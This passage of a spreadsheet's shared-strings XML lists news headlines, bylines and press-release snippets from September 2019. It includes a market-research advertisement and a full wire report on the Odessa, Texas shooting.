    <t>Krystal Frasier                            Social Media and Digital Content Manager</t>
  </si>
  <si>
    <t>DULUTH, MN — A member of the Duluth School Board has resigned, citing his health and well-being, family, and career. Gorham, who is in his...</t>
  </si>
  <si>
    <t>NEW YORK --(BUSINESS WIRE) Scott+Scott Attorneys at Law LLP (“Scott+Scott”), an international securities and consumer rights litigation...</t>
  </si>
  <si>
    <t>EILEEN NG Associated Press</t>
  </si>
  <si>
    <t>HONG KONG (AP) — Thousands of Hong Kong soccer fans booed loudly and turned their backs when the Chinese national anthem was played before...</t>
  </si>
  <si>
    <t>ODESSA, Texas (AP) — The Latest on a shooting in West Texas (all times local): 2:30 p.m. An FBI agent says the gunman in a West Texas...</t>
  </si>
  <si>
    <t>Christopher Smith</t>
  </si>
  <si>
    <t>This car is unbelievably rare.</t>
  </si>
  <si>
    <t>LONDON, Sept. 03, 2019 (GLOBE NEWSWIRE) -- Hutchison China MediTech Limited (“Chi-Med”) (AIM/Nasdaq: HCM) today announces that Christian...</t>
  </si>
  <si>
    <t>Posted by A.F. Branco</t>
  </si>
  <si>
    <t>Copyright © 2019 EYT Media Group, Inc. All rights reserved. Any copying, redistribution or retransmission of the contents of this service...</t>
  </si>
  <si>
    <t>Michael Dixon</t>
  </si>
  <si>
    <t>Sentiment for MTS Systems Corp (NASDAQ:MTSC) MTS Systems Corp (NASDAQ:MTSC) institutional sentiment increased to 1.36 in 2019 Q2. Its up...</t>
  </si>
  <si>
    <t>SINGAPORE, Sept. 29, 2019 /PRNewswire-PRWeb/ -- A leading provider of Precision Performance Marketing technology and solutions, Knorex...</t>
  </si>
  <si>
    <t>Keller Williams (KW), the world's largest real estate technology franchise by agent count, is expanding across Asia. As momentum continues,...</t>
  </si>
  <si>
    <t>Prime Minister Nikol Pashinyan who is in New York on a working visit met with NATO Secretary General Jens Stoltenberg. Greeting the NATO...</t>
  </si>
  <si>
    <t>The Return on Invested Capital (aka ROIC) Score for Chase Corporation (AMEX:CCF) is 5.276524. The Return on Invested Capital is a ratio...</t>
  </si>
  <si>
    <t>A man has been sentenced to 2-years and six months in prison for intending to stir up racial hatred. 46-year-old Nathan Worrell of Scott...</t>
  </si>
  <si>
    <t>By MICHAEL LIEDTKE | The Associate Press SAN JOSE — A federal judge has rejected a government recommendation that he impose a $10 million...</t>
  </si>
  <si>
    <t>Whitley Bay's Seaweed &amp; Co. provides healthy seaweed ingredients that can be added to recipes</t>
  </si>
  <si>
    <t>TV Guide</t>
  </si>
  <si>
    <t>An investigation by production company Entertainment One (eOne) into claims of racial and sexual harassment on the set of The Rookie found...</t>
  </si>
  <si>
    <t>Chopra's remarks on antitrust concerns come hours after the House Judiciary Committee said it requested documents from Facebook, Apple,...</t>
  </si>
  <si>
    <t>Originally posted on https://kindmedsaz.com/blog/company-behind-arizona-marijuana-product-is-as-important-as-the-smoke/ Our level of...</t>
  </si>
  <si>
    <t>Air Spring Industry 2019 Global Market research report provides key analysis on the market status of the Air Spring manufacturers with...</t>
  </si>
  <si>
    <t>WASHINGTON — The scope and precision of attacks on Saudi Arabian oil facilities suggest the launch was not made by Houthis and came from a...</t>
  </si>
  <si>
    <t>Checking in on the short-term signals on Kootenay Silver Inc WT (KOYWF), we note that the current 7-day average directional indicator is...</t>
  </si>
  <si>
    <t>Senior U.S. senators asked President Donald Trump's administration on Tuesday to assess U.S. export controls with regard to Hong Kong,...</t>
  </si>
  <si>
    <t>Kelly Messenger</t>
  </si>
  <si>
    <t>Deltex Medical Group plc (LON:DEMG)’s stock price traded down 5.5% during mid-day trading on Monday . The stock traded as low as GBX 1.21...</t>
  </si>
  <si>
    <t>OAKLAND, Calif., Sept. 17, 2019 /PRNewswire/ -- The Clorox Company (NYSE: CLX) today announced that its board of directors has declared a...</t>
  </si>
  <si>
    <t>Kevin Hart is improving after a vehicle coincidence. According to a statement provided to ET by way of the California Highway Patrol, Hart...</t>
  </si>
  <si>
    <t>Made In Chelsea star Jamie Laing has thrown his hat into the ring to appear on this year’s I’m A Celebrity… Get Me Out Of Here! The...</t>
  </si>
  <si>
    <t>Primoris Services Corp (NASDAQ:PRIM) Director Brian Pratt sold 206,439 shares of the firm’s stock in a transaction that occurred on...</t>
  </si>
  <si>
    <t>Experts Discuss the Challenges and Opportunities for Sales Leaders in Today’s Complex B2B Buying Environment at the Gartner CSO &amp; Sales...</t>
  </si>
  <si>
    <t>by SARAH CAVINESS | Sinclair Broadcast Group</t>
  </si>
  <si>
    <t>GEORGETOWN, S.C. (SBG) -- A woman on a hunting trip in South Carolina bagged the catch of a lifetime and she's got the photos to prove it....</t>
  </si>
  <si>
    <t>Gold, bonds and other defensive assets are prime options to get defensive in today’s market, but one area to consider is utility-focused...</t>
  </si>
  <si>
    <t>Sollorano, Vic</t>
  </si>
  <si>
    <t>MONEY- gas thumbnail gas station gas stations oil price hike oil price rollback fuel prices gas pump gas station gas station pump fuel...</t>
  </si>
  <si>
    <t>Steve Dowling, the head of Apple's public relations department, announced he will be leaving this week.</t>
  </si>
  <si>
    <t>KRISTEN DE GROOT -</t>
  </si>
  <si>
    <t>PHILADELPHIA — Ezra has been locked up for about 45 years. In that time, he’s taken the opportunities he’s been given in prison, grown from...</t>
  </si>
  <si>
    <t>San Jose, CA, September 27, 2019 --(PR.com)-- The Credit Docs is a credit repair company based in San Jose, California and offers credit...</t>
  </si>
  <si>
    <t>New Mexico Educational Retirement Board cut its stake in CyrusOne Inc (NASDAQ:CONE) by 11.8% in the second quarter, according to the...</t>
  </si>
  <si>
    <t>By CHRIS TALBOTT Associated Press</t>
  </si>
  <si>
    <t>SEATTLE (AP) — Cincinnati Reds right-hander Sonny Gray lost a no-hit bid in the seventh inning when Seattle Mariners rookie Kyle Lewis hit...</t>
  </si>
  <si>
    <t>Volkswagen debuted today the Volkswagen ID.3 for the European market. Those of you reading from North America will be disappointed to learn...</t>
  </si>
  <si>
    <t>Orange, Conn. - Ernie’s Garage, a full-service auto repair shop located at 79 Boston Post Road in Orange, Connecticut, has announced new...</t>
  </si>
  <si>
    <t>Travis Nyhus</t>
  </si>
  <si>
    <t>The Menomonie boys soccer team's defense held on for as long as it could. Then the flood gates opened. Rice Lake scored twice in less...</t>
  </si>
  <si>
    <t>Sep, Wed 18 2019 - 7:00 PM to 11:30 PM</t>
  </si>
  <si>
    <t>Finding the positives in Mitch Trubisky’s Week 1 performance is difficult — for whoever draws the assignment of polishing perhaps his worst...</t>
  </si>
  <si>
    <t>The fourth Ashes Test starts at Old Trafford on Wednesday with the series level at 1-1 following England’s astonishing win at Headingley....</t>
  </si>
  <si>
    <t>Both companies are teaming up to enable brands to track seed-to-sale and engage consumers to easily verify the authenticity of individual...</t>
  </si>
  <si>
    <t>For more than 20 years, knitting enthusiast Sam Barsky has been creating jumpers that match his travel destinations. The 44-year-old from...</t>
  </si>
  <si>
    <t>Stacey Dooley is set to host the live Strictly Come Dancing tour heading to Birmingham next year.</t>
  </si>
  <si>
    <t>Issued at 1100 AM AST Sat Sep 21 2019 000 WTNT35 KNHC 211452 TCPAT5 BULLETIN Tropical Storm Jerry Advisory Number 17 NWS National...</t>
  </si>
  <si>
    <t>VAN WERT, OH, Sept. 23, 2019 /PRNewswire/ - Demers Ambulances USA Inc. (''Demers''), announced eleven (11) exclusive dealers that will...</t>
  </si>
  <si>
    <t>Congressman David Cicilline, chair of the U.S. House Judiciary Committee's antitrust panel, said on Friday that Facebook Chief Executive...</t>
  </si>
  <si>
    <t>RealTract (CURRENCY:RET) traded 2.2% lower against the US dollar during the 1 day period ending at 22:00 PM ET on September 26th. In the...</t>
  </si>
  <si>
    <t>The Pentagon's announcement that it will divert $3.6 billion in military construction funds to help fund President Donald Trump's border...</t>
  </si>
  <si>
    <t>Tennessee Director of Athletics Phillip Fulmer recently promoted longtime UTAD staffer Dr. Michael R. Allen to the role of Assistant...</t>
  </si>
  <si>
    <t>Callum Mitchell-Simon</t>
  </si>
  <si>
    <t>It's always good news when a new Natalie McCool number rolls onto our speakers, and her latest, "Someone Nue," is no exception. Following...</t>
  </si>
  <si>
    <t>Robbie Meredith</t>
  </si>
  <si>
    <t>"Some electrical wires would be attached initially to my feet. "They would give me a shock and would continue giving me a shock every 15 or...</t>
  </si>
  <si>
    <t>MONTREAL (AP) — Allan Cruz scored in the first minute in expansion FC Cincinnati's 1-0 victory over the Montreal Impact on Saturday night....</t>
  </si>
  <si>
    <t>Press Release</t>
  </si>
  <si>
    <t>PHILADELPHIA – Two Robbers, a hard seltzer company from Philadelphia, announced that it is partnering with Yards Brewing Company, Philly’s...</t>
  </si>
  <si>
    <t>LEXINGTON, Ky. (AP) — A man convicted of leaking Singapore’s HIV patient database as part of an alleged extortion attempt has been...</t>
  </si>
  <si>
    <t>MADURA MCCORMACK, Townsville Bulletin</t>
  </si>
  <si>
    <t>ALBERT Abdul-Rahman, a self-confessed “loose cannon”, has an active mind but due to stigma and the “curse” of transportation issues for...</t>
  </si>
  <si>
    <t>TORC Oil and Gas Ltd (OTCMKTS:VREYF) shares crossed above its two hundred day moving average during trading on Monday . The stock has a two...</t>
  </si>
  <si>
    <t>David Staples, Edmonton Journal</t>
  </si>
  <si>
    <t>Pre-season Game Day vs Arizona This in from the Edmonton Oilers, the team’s projected line-up against the Arizona Coyotes:...</t>
  </si>
  <si>
    <t>A bankrupt businessman jailed for murdering his ex-wife, stuffing her body in a suitcase and dumping it in Perth's Swan River has appealed...</t>
  </si>
  <si>
    <t>Sep, Wed 18 2019 - 10:00 AM to 12:00 PM</t>
  </si>
  <si>
    <t>Originally posted on https://www.cryoinnovations.com/blog/2019/9/5/the-secret-power-of-tony-robbins Life coach, author and successful...</t>
  </si>
  <si>
    <t>Get ready to Attempt Cisco 700-751 Certification Exam? If you are planning to attempt the Cisco 700-751 Exam, then you must use the updated...</t>
  </si>
  <si>
    <t>RESTON, Va., Sept. 19, 2019 /PRNewswire/ -- Collaborative Solutions announced its placement on FORTUNE Magazine and Great Place to Work®'s...</t>
  </si>
  <si>
    <t>Sep 26, 2019 (SmarTrend(R) News Watch via COMTEX News Network) -- Biogen Inc (NASDAQ:BIIB) traded in a range yesterday that spanned from a...</t>
  </si>
  <si>
    <t>MONTEREY, Calif., Sept. 26, 2019 /PRNewswire/ -- Monterey Peninsula Surgery Centers, LLC ("MPSC") announced it was honored with two awards...</t>
  </si>
  <si>
    <t>Canadian rapper Drake has said he related to the UK series Top Boy because it reminded him of where he grew up in Toronto.</t>
  </si>
  <si>
    <t>David Gaider is starting a new studio.</t>
  </si>
  <si>
    <t>DALLAS, Sept. 27, 2019 /PRNewswire/ -- Comerica Bank is responding to an ongoing brand infringement incident being perpetrated by a group...</t>
  </si>
  <si>
    <t>Former Welsh rugby star Gareth Thomas’s revelation that he is living with HIV has led to a significant increase in phone and online...</t>
  </si>
  <si>
    <t>AURORA, Ill., Sept. 20, 2019 /PRNewswire/ -- Tangent Technologies, LLC today announced it has completed the simultaneous acquisitions of...</t>
  </si>
  <si>
    <t>FARAI MUTSAKA Associated Press</t>
  </si>
  <si>
    <t>HARARE, Zimbabwe (AP) — Zimbabwean doctors protesting the alleged abduction of a union leader were met by a line of baton-wielding police...</t>
  </si>
  <si>
    <t>Leigh Mcmanus For Mailonline</t>
  </si>
  <si>
    <t>She is best known for her portrayal of Arya Stark in Game Of Thrones star. But Maisie Williams was worlds away from Winterfell as she...</t>
  </si>
  <si>
    <t>The research paper titled “Lithium Battery Equipment Market Report 2019 – Global Market Size, Share, Price, Trend and Forecast” available at ABRReports.com. The study gives a brief idea about the current market dynamics, global and regional overview, insights on market players with segmentation There are 4 key segments covered in this report: competitor segment, product type segment, end use/application segment, and geography segment. Get the PDF sample report @ https://www.abrreports.com/industry-insights/global-lithium-battery-equipment-market-report-2019-market-size-share-price-trend-and-forecast?form=request-report-sample For competitor segment, the report includes global key players of Lithium Battery Equipment as well as some small players. At least 9 companies are included: * CKD * HIRANO * Kaido MFG * Toray Engineering * Yinghe Technology Co. * Ltd The information for each competitor includes: * Company Profile * Main Business Information * SWOT Analysis * Sales, Revenue, Price and Gross Margin * Market Share For product type segment, this report listed main product type of Lithium Battery Equipment market * Product Type I * Product Type II * Product Type III For end use/application segment, this report focuses on the status and outlook for key applications. End users are also listed. * Application I * Application II * Application III Access the research [email protected] https://www.abrreports.com/industry-insights/global-lithium-battery-equipment-market-report-2019-market-size-share-price-trend-and-forecast The key insights of the report: 1. The report provides key statistics on the market status of the Lithium Battery Equipment manufacturers and is a valuable source of guidance and direction for companies and individuals interested in the industry. 2. The report provides a basic overview of the industry including its definition, applications and manufacturing technology. 3. The report presents the company profile, product specifications, capacity, production value, and 2013-2018 market shares for key vendors. 4. The total market is further divided by company, by country, and by application/type for the competitive landscape analysis. 5. The report estimates 2019-2024 market development trends of Lithium Battery Equipment industry. 6. Analysis of upstream raw materials, downstream demand, and current market dynamics is also carried out 7. The report makes some important proposals for a new project of Lithium Battery Equipment Industry before evaluating its feasibility. For geography segment, regional supply, application-wise, and type-wise demand, major players, price is presented from 2013 to 2023. This report covers the following regions: * North America * South America * Asia &amp; Pacific * Europe * MEA (Middle East and Africa) The key countries in each region are taken into consideration as well, such as United States, China, Japan, India, Korea, ASEAN, Germany, France, UK, Italy, Spain, CIS, and Brazil etc. Important pointers from Table of Contents: Chapter 1 Executive Summary Chapter 2 Abbreviation and Acronyms Chapter 3 Preface Chapter 4 Market Landscape Chapter 5 Market Trend Analysis Chapter 6 Industry Chain Analysis Chapter 7 Latest Market Dynamics Chapter 8 Trading Analysis Chapter 9 Historical and Current Lithium Battery Equipment in North America (2013-2018) Chapter 10 Historical and Current Lithium Battery Equipment in South America (2013-2018) Chapter 11 Historical and Current Lithium Battery Equipment in Asia &amp; Pacific (2013-2018) Chapter 12 Historical and Current Lithium Battery Equipment in Europe (2013-2018) Chapter 13 Historical and Current Lithium Battery Equipment in MEA (2013-2018) Chapter 14 Summary for Global Lithium Battery Equipment (2013-2018) Chapter 15 Global Lithium Battery Equipment Forecast (2019-2023) Chapter 16 Analysis of Global Key Vendors Reasons to Purchase this Report: * Analyzing the outlook of the market with the recent trends and SWOT analysis * Market dynamics scenario, along with growth opportunities of the market in the years to come * Market segmentation analysis including qualitative and quantitative research incorporating the impact of economic and non-economic aspects * Regional and country-level analysis integrating the demand and supply forces that are influencing the growth of the market. * Market value (USD Million) and volume (Units Million) data for each segment and sub-segment * Competitive landscape involving the market share of major players, along with the new projects and strategies adopted by players in the past five years * Comprehensive company profiles covering the product offerings, key financial information, recent developments, SWOT analysis, and strategies employed by the major market players * 1-year analyst support, along with the data support in excel format. We also can offer a customized report to fulfill the special requirements of our clients. Regional and Countries report can be provided as well. About Us: ABR Reports (Advanced Business Research Reports) is the premium market research reselling company which offers market research reports to individuals, organizations, and industries to enhance and strengthen the decision making process. With associate thoroughgoing list of market research Publishers we tend to cut across over all the business verticals covering 5000+ micro markets and offer market size and share analysis, industry trend, information on products, regional market and keen business insights to our clients. Contact Us: Scott Haris Global Sales Manager Email ID: [email protected] Phone No.: +15614487424 Download Nulled WordPress Themes Download Premium WordPress Themes Free Free Download WordPress Themes Download WordPress Themes Free free online course download lenevo firmware Download WordPress Themes free download udemy paid course Tagsglobal Lithium Battery Equipment market trends Lithium Battery Equipment market Lithium Battery Equipment market 2019 Lithium Battery Equipment market analysis Lithium Battery Equipment market demand Lithium Battery Equipment market forecast Lithium Battery Equipment market insights Lithium Battery Equipment market price Lithium Battery Equipment market production Lithium Battery Equipment market share Lithium Battery Equipment market size Lithium Battery Equipment market supply</t>
  </si>
  <si>
    <t>0 comment England face a fight to the keep their Ashes campaign afloat after Josh Hazlewood squashed a brave resistance from Rory Burns...</t>
  </si>
  <si>
    <t>Ethan McLeod</t>
  </si>
  <si>
    <t>Conservative talking head and Baltimore agitator Tucker Carlson’s early October appearance at the Modell Lyric has been called off....</t>
  </si>
  <si>
    <t>UTICA, N.Y., Sept. 17, 2019 /PRNewswire-PRWeb/ -- JETNET LLC, the world leader in business business aviation market intelligence, will be...</t>
  </si>
  <si>
    <t>HOPE YEN and CALVIN WOODWARD</t>
  </si>
  <si>
    <t>President Donald Trump arrives on stage at the Crown Expo for a campaign rally, Monday, Sept. 9, 2019, in Fayetteville, N.C. (AP Photo/Evan...</t>
  </si>
  <si>
    <t>Carol Bradley Bursack / Forum News Service</t>
  </si>
  <si>
    <t>Dear Carol: My 71-year-old mother is slender, a non-smoker, socially active and gets a decent amount of exercise. She takes three...</t>
  </si>
  <si>
    <t>Global Wireless Sensor Network market is expected to grow at the rate of more than ~14% from 2016 to 2022 and Wireless Sensor Network...</t>
  </si>
  <si>
    <t>Modern smartphones with big and vibrant displays have made it feasible for us to monitor tens of millions of content material in...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 03, 2019 (GLOBE NEWSWIRE) -- Bragar Eagel &amp; Squire, P.C. reminds investors that class action lawsuits have been commenced...</t>
  </si>
  <si>
    <t>Fountain (CURRENCY:FTN) traded down 1.3% against the U.S. dollar during the 24 hour period ending at 16:00 PM E.T. on September 15th....</t>
  </si>
  <si>
    <t>By Marianne Garvey, CNN</t>
  </si>
  <si>
    <t>Brad Pitt surprised Ellen DeGeneres when he appeared on her show Friday as an an overenthusiastic audience member. Sitting in a pageboy cap...</t>
  </si>
  <si>
    <t>PURVIS, Miss. (AP) — Mississippi's Lamar County School District needs help to shuttle 5,800 students to school and back home safely and on...</t>
  </si>
  <si>
    <t>JAKARTA, Indonesia (AP) — Indonesia's anti-graft commission has arrested a former sports minister accused of stealing 26.5 billion rupiah...</t>
  </si>
  <si>
    <t>Explore more than just Havana; act like a local in Sicily; make the pilgrimage to Jerusalem; or relax in Bali.</t>
  </si>
  <si>
    <t>Karen Gordon</t>
  </si>
  <si>
    <t>Tech in Motion announces top local tech companies and launches public voting to determine winners. D.C.-based Goodshuffle announced among...</t>
  </si>
  <si>
    <t>Originally posted on https://www.homeward.com/blog/3-steps-to-selling-and-buying-a-house-at-the-same-time/ In a perfect world, real...</t>
  </si>
  <si>
    <t>Steve Larkin</t>
  </si>
  <si>
    <t>Nathan Buckley and Chris Scott are inextricably linked. The chain connecting Collingwood coach Buckley and Geelong mentor Scott extends...</t>
  </si>
  <si>
    <t>PROVIDENCE, R.I. (AP) — The Latest on how universities are dealing with past donations from Jeffrey Epstein (all times local): 4:55 p.m....</t>
  </si>
  <si>
    <t>Caroline Schelle</t>
  </si>
  <si>
    <t>Pieces from a 155-year-old shipwreck washed ashore on a Victorian beach with archaeologists planning to rebury the fragments. Works are...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 07, 2019 (GLOBE NEWSWIRE) -- Rosen Law Firm, a global investor rights law firm, reminds purchasers of the securities of...</t>
  </si>
  <si>
    <t>Submitted article |</t>
  </si>
  <si>
    <t>LITTLETON – Life Care Centers of America presented Life Care Center of Nashoba Valley in Littleton, Massachusetts, with two of its annual...</t>
  </si>
  <si>
    <t>Week 1 in the NFL provided a bevy of highlights, a whole lot of questions and simplest a few answers. Will Week 2 supply more of a similar?...</t>
  </si>
  <si>
    <t>Victor Deng</t>
  </si>
  <si>
    <t>Port of Miami 2-themed Essence 2 ACE.</t>
  </si>
  <si>
    <t>SAN JOSE, Calif. — A former Yahoo software engineer has pleaded guilty to hacking into the accounts of some 6,000 Yahoo users in search of...</t>
  </si>
  <si>
    <t>BERLIN German authorities have closed three pharmacies in the western city of Cologne after a pregnant woman died after using a tainted...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / September 18, 2019 / Ceres Global Ag Corp. (TSX:CRP) will be discussing their earnings results in their 2019...</t>
  </si>
  <si>
    <t>SAN MATEO, Calif., Sept. 4, 2019 /PRNewswire/ -- Coupa Software (NASDAQ:COUP), a leader in Business Spend Management (BSM), today announced...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 12, 2019 (GLOBE NEWSWIRE) -- Rosen Law Firm, a global investor rights law firm, reminds purchasers of the securities of...</t>
  </si>
  <si>
    <t>AUSTIN, Texas, Sept. 3, 2019 /PRNewswire/ -- Nulo Pet Food, one of the fastest-growing super-premium pet foods in the U.S. continues its...</t>
  </si>
  <si>
    <t>By BOB FORD The Philadelphia Inquirer The Phillies exited baseball's postseason race quietly Tuesday afternoon in Washington. If their...</t>
  </si>
  <si>
    <t>Cash back rewards are the most popular</t>
  </si>
  <si>
    <t>U.S. producer prices unexpectedly rose in August and underlying producer inflation rebounded, but the data on Wednesday did not change...</t>
  </si>
  <si>
    <t>Cham Altatis launched Social Video Ads, a unique training program for businesses and entrepreneurs interested in using Facebook video ad...</t>
  </si>
  <si>
    <t>For a credit union founded by 15 teachers 80 years ago, helping Valley students and teachers start their year off right is an important...</t>
  </si>
  <si>
    <t>James Fyfe</t>
  </si>
  <si>
    <t>Lime removed one of its scooters from the scene of a fatal accident last week before emergency services arrived, an Auckland Councillor has...</t>
  </si>
  <si>
    <t>ProjectorReviews.com has just published their Best Home Theater Projectors Report, which details a comprehensive list of the top home...</t>
  </si>
  <si>
    <t>This webinar is co-produced by West LegalEdCenter™ and part of the "Hot Topics 2019" series. It will feature Chris Cahill (Lowis &amp; Gellen...</t>
  </si>
  <si>
    <t>The stock of Aemetis, Inc. (AMTX) formed H&amp;S with $1.14 target or 4.00 % below today’s $1.19 share price. The 7 months Head &amp; Shoulders...</t>
  </si>
  <si>
    <t>Best Mens Cuff Links, Shirt Studs &amp; Tie Clips - Buying Guide Last Updated: 09/24/2019 Share on Bestselling Mens Cuff Links, Shirt Studs &amp;...</t>
  </si>
  <si>
    <t>MARI YAMAGUCHI Associated Press</t>
  </si>
  <si>
    <t>TOKYO (AP) — Japan tried to reassure foreign diplomats Wednesday about safety at the crippled Fukushima nuclear plant amid concerns about...</t>
  </si>
  <si>
    <t>ROME (AP) — Italian police have detained 10 people in the central Abruzzo region for alleged tax crimes and money laundering aimed at...</t>
  </si>
  <si>
    <t>Josh Clayton</t>
  </si>
  <si>
    <t>The Percentage Price Oscillator is above the signal line on shares of Royal Dutch Shell Plc (RDS-A). Traders watching these levels may be...</t>
  </si>
  <si>
    <t>By LAURA McMULLEN NerdWallet</t>
  </si>
  <si>
    <t>What you do with your paychecks in college can affect your financial life long after you toss your graduation cap. By saving money and...</t>
  </si>
  <si>
    <t>LONDON — In 2009, a little-known British politician declared he didn’t want to live in a European empire of the 21st century. The speaker...</t>
  </si>
  <si>
    <t>Radpay, an Arizona-based decentralized global payment processing company reimagining payments and rewards, today announced the development...</t>
  </si>
  <si>
    <t>AnitaB.org today announced the results of the organization’s annual Top Companies for Women Technologists program, the only industry...</t>
  </si>
  <si>
    <t>Justin Chadwick</t>
  </si>
  <si>
    <t>The Cattery was a nightmare but the MCG will feel somewhat like home when West Coast players step out for Friday's semi-final against...</t>
  </si>
  <si>
    <t>By JOHN MARSHALL AP Sports Writer</t>
  </si>
  <si>
    <t>UCLA pulled off an epic comeback against Washington State last weekend, saving its season, possibly coach Chip Kelly's job. The Bruins...</t>
  </si>
  <si>
    <t>Growing lifestyle brand brings on industry veteran</t>
  </si>
  <si>
    <t>SAN FRANCISCO, CA - (NewMediaWire) - September 09, 2019 - Simlatus Corporation (OTC PINK: SIML) (“Simlatus” or the “Company”), Chairman and...</t>
  </si>
  <si>
    <t>the Associated Press</t>
  </si>
  <si>
    <t>DES MOINES, Iowa (AP) - Iowa Supreme Court Chief Justice Mark Cady has removed himself from considering a lawsuit challenging a new law...</t>
  </si>
  <si>
    <t>Fantasy baseball managers can no longer brush off shortcomings by pointing to the calendar and remarking on how early it is in the season....</t>
  </si>
  <si>
    <t>Southern Cross Austereo and Podcast One have announced the full lineup for the Future Proof Your Business SME business building event and...</t>
  </si>
  <si>
    <t>Despite positive numbers from app downloads and a stellar slate of original content coming out of Netflix, investors are still fleeing the...</t>
  </si>
  <si>
    <t>(WHDH)– Hurricane Dorian’s punishing winds and rising floodwaters have left the island’s most vulnerable inhabitants at risk. Those...</t>
  </si>
  <si>
    <t>Matt Reynolds</t>
  </si>
  <si>
    <t>The Videojet 7340 and 7440 fiber laser marking systems are designed for coding aluminum.</t>
  </si>
  <si>
    <t>Jofra Archer and Sam Curran combined to hand England a vital first-innings lead in the final Ashes Test, raising hopes of a...</t>
  </si>
  <si>
    <t>Hunton Andrews Kurth LLP announced the expansion of its global environmental practice with the addition of David C. McSweeney as counsel in...</t>
  </si>
  <si>
    <t>ContraFect Corp (NASDAQ:CFRX) saw unusually-high trading volume on Wednesday . Approximately 1,415,948 shares traded hands during mid-day...</t>
  </si>
  <si>
    <t>SELBYVILLE, Delaware, Sept. 26, 2019 /PRNewswire/ -- Based on forms, this commercial seaweed market report conducted by Global Market...</t>
  </si>
  <si>
    <t>WILMINGTON, Del., Sept. 26, 2019 (GLOBE NEWSWIRE) -- Rigrodsky &amp; Long, P.A. announces that it is investigating: Proteon Therapeutics,...</t>
  </si>
  <si>
    <t>by John Marchesan</t>
  </si>
  <si>
    <t>A city of Odessa police car, left, and a U.S. mail vehicle, right, which were involved in Saturday's shooting, are pictured outside the Cinergy entertainment center, Sunday, Sept. 1, 2019, in Odessa, Texas. (AP Photo/Sue Ogrocki) Authorities said Sunday they still could not explain why a man with an AR-style weapon opened fire during a routine traffic stop in West Texas to begin a terrifying rampage that killed seven people, injured 22 others and ended with officers gunning him down outside a movie theatre. Odesa police identified the shooter as 36-year-old Seth Ator. They didn’t provide any additional info. Odesa Police Chief Michael Gerke had refused to publicly say the name of the gunman during a national televised news conference Sunday, saying he did not want to give the shooter notoriety. He had previously described the gunman as a white male in his 30s, and authorities told reporters that the shooter had a criminal record but did not go into detail The gunman acted alone and federal investigators believe the shooter had no ties to any domestic or international terrorism group, FBI special agent Christopher Combs said. Authorities said those killed were between the ages of 15 and 57 years old but did not immediately provide a list of names. The injured included three law enforcement officers. Gerke said there were still no answers as to the shooter’s motives. The shooting began Saturday afternoon with an interstate traffic stop where gunfire was exchanged with police, setting off a chaotic rampage during which the suspect hijacked a mail carrier truck and fired at random as he drove in the area of Odesa and Midland, two cities in the heart of Texas oil country more than 300 miles (483 kilometres) west of Dallas. Combs said the gunman might have entered the Odesa movie theatre where the chase ended if police had not taken him down. “In the midst of a man driving down the highway shooting at people, local law enforcement and state troopers pursued him and stopped him from possibly going into a crowded movie theatre and having another event of mass violence,” Combs said. The shooting came at the end of an already violent month in Texas, where on Aug. 3 a gunman in the border city of El Paso killed 22 people at a Walmart. Sitting beside authorities in Odesa, Republican Gov. Greg Abbott ticked off a list of mass shootings that have now killed nearly 70 since 2016 in his state alone. “I have been to too many of these events,” Abbott said. “Too many Texans are in mourning. Too many Texans have lost their lives. The status quo in Texas is unacceptable, and action is needed.” But Abbott remains noncommittal about imposing any new gun laws in Texas at a time when Democrats and gun-control groups are demanding restrictions. And even as Abbott spoke, a number of looser gun laws that he signed this year took effect on the first day of September, including one that would arm more teachers in Texas schools. The terrifying chain of events began when Texas state troopers tried pulling over a gold car mid-Saturday afternoon on Interstate 20 for failing to signal a left turn, Texas Department of Public Safety spokeswoman Katherine Cesinger said. Before the vehicle came to a complete stop, the driver “pointed a rifle toward the rear window of his car and fired several shots” toward the patrol car stopping him. The gunshots struck one of two troopers inside the patrol car, Cesinger said, after which the gunman fled and continued shooting. Two other police officers were shot before the suspect was killed. Authorities say the trooper was in serious but stable condition on Saturday, and the other officers were stable. Witnesses described gunfire near shopping plazas and in busy intersections Dr. Nathaniel Ott was working at an Odesa emergency care centre where he is the medical director when he gunshots. He rushed outside to find a woman in the driver’s seat of an SUV bleeding from a gunshot wound in the arm. Ott said that as he and a paramedic were working on the woman, the shooter drove back by, followed by police. “The shooter drove within 30 feet of us and drove up that road,” Ott said Sunday, pointing to one of the streets leading past the shopping centre where his facility is located. “The shooter was driving. It was insane. He was just everywhere.” He said the woman was taken to a hospital and he doesn’t know how she’s doing. Daniel Munoz, 28, of Odesa, was driving Saturday afternoon to meet a friend at a bar but first had to stop for gas. Once his tank was full, he returned to the road but had to yield to traffic coming off Interstate 20. As a car approached slowly, he immediately noticed what he feared to be the barrel of a rifle in the hands of the driver. “This is my street instincts: When a car is approaching you and you see a gun of any type, just get down,” said Munoz, who moved from San Diego about a year ago to work in oil country. “Luckily I got down. … Sure enough, I hear the shots go off. He let off at least three shots on me.” Saturday’s shooting brings the number of mass killings in the U.S. so far this year to 25, matching the number in all of 2018, according to The AP/USATODAY/Northeastern University mass murder database. The number of people killed this year has already reached 142, surpassing the 140 people who were killed of all last year. The database tracks homicides where four or more people are killed, not including the offender. President Donald Trump has offered contradictory messages in reacting to recent mass shootings. Days after the El Paso shooting, he said he was eager to implement “very meaningful background checks” on guns and told reporters there was “tremendous support” for action. He later backed away, saying the current system of background checks was “very, very strong.” On Sunday, Trump reiterated his more recent calls for greater attention to mental health. Trump has said new facilities are needed for the mentally ill to reduce mass shootings. However, some mental health professionals say such thinking is outdated, that linking mental illness to violence is wrong, and that the impact of more treatment would be helpful overall but would have a minor impact on gun violence.</t>
  </si>
  <si>
    <t>Dublin, Sept. 27, 2019 (GLOBE NEWSWIRE) -- The "Bottled Water Processing - Global Market Outlook (2018-2027)" report has been added...</t>
  </si>
  <si>
    <t>BEIRUT Syrian opposition activists say anti-government protesters have captured at least two army checkpoints in the eastern province of...</t>
  </si>
  <si>
    <t>Researchers say the neutron star is almost too massive to exist, coming in at 2.17 times the mass of the sun packed into a sphere only...</t>
  </si>
  <si>
    <t>U.S. consumer confidence ebbed in September as an escalation in trade tensions fanned concerns about business and labor market conditions,...</t>
  </si>
  <si>
    <t>The global Plasma Etch System market was valued at $XX million in 2018, and analysts predict the global market size will reach $XX million...</t>
  </si>
  <si>
    <t>The Marvelous Mrs Maisel star Alex Borstein dedicated her Emmy Award win to her Holocaust survivor grandmother. The actress won a...</t>
  </si>
  <si>
